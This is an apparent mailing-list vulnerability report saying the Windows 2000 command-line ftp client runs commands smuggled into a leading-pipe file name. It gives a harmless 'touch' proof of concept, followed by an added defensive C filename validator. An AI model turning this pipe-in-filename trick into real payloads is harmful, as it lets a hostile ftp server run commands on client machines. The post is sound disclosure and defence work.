Securityfocus has a post on its website regarding this vulnerability in many ftp clients. I've tested and subsequently validated this issue on many of the platforms mentioned in their advisory. They mention the Netscape client on Windows 2000 Professional, but fail to mention that the command-line ftp client included with win2k (server and pro) is also vulnerable.

<-----------------------snip----------------------->
# Create file on ftp server for download by client.
schoe@ftp:/home/ftp$ touch \|touch\ file

# Start commandline ftp client on win2k.
Microsoft Windows 2000 [Version 5.00.2195]
<C> Copyright 1985-2000 Microsoft Corp.

C:\ ftp ftp.xxxx.com
....
ftp> get "|touch file.txt"
...
ftp> quit
221 Goodbye.

# "C:\file.txt" should now exist.
<-----------------------snap----------------------->

Multiple Vendor VTP pipe Vulnerability
======================================
www.securityfocus.com/bid/396/info

.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer |
.-------------------------------------------.---.
| Oceanic Imaging Consultants, Inc. |
| Phone #: (808) 539.3634 |
.-----------------------------------.
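A client-side check for the file name shown in the post, added here as an example and not taken from the post, the advisory or any vendor's ftp client. It assumes the client opens the local output file through a routine that treats a leading `|` as "run this as a command" and a bare `-` as standard output, as BSD-derived ftp clients do; the function name `is_safe_local_name` and the 255-byte limit are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: decide whether a name taken from the server (or
 * defaulted from the remote name) may be used as the local output file.
 * Returns 1 if the name is acceptable, 0 if it must be rejected. */
int is_safe_local_name(const char *name)
{
    size_t i, len;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > 255)          /* assumed limit for one path component */
        return 0;
    if (name[0] == '|')                 /* pipe-aware clients run the rest as a command */
        return 0;
    if (name[0] == '-')                 /* "-" means stdout; also blocks option-like names */
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '/' || c == '\\' || c == ':')  /* no directories or drive letters */
            return 0;
        if (iscntrl(c))                         /* no CR, LF, TAB or other control bytes */
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample names; the first is the one used in the post. */
    const char *samples[] = { "|touch file.txt", "file.txt", "..\\file.txt", "-" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-18s %s\n", samples[i],
               is_safe_local_name(samples[i]) ? "accept" : "reject");
    return 0;
}
```

A client would call this on the local name before opening it and, on rejection, ask the user for an explicit local file name instead of reusing the remote one.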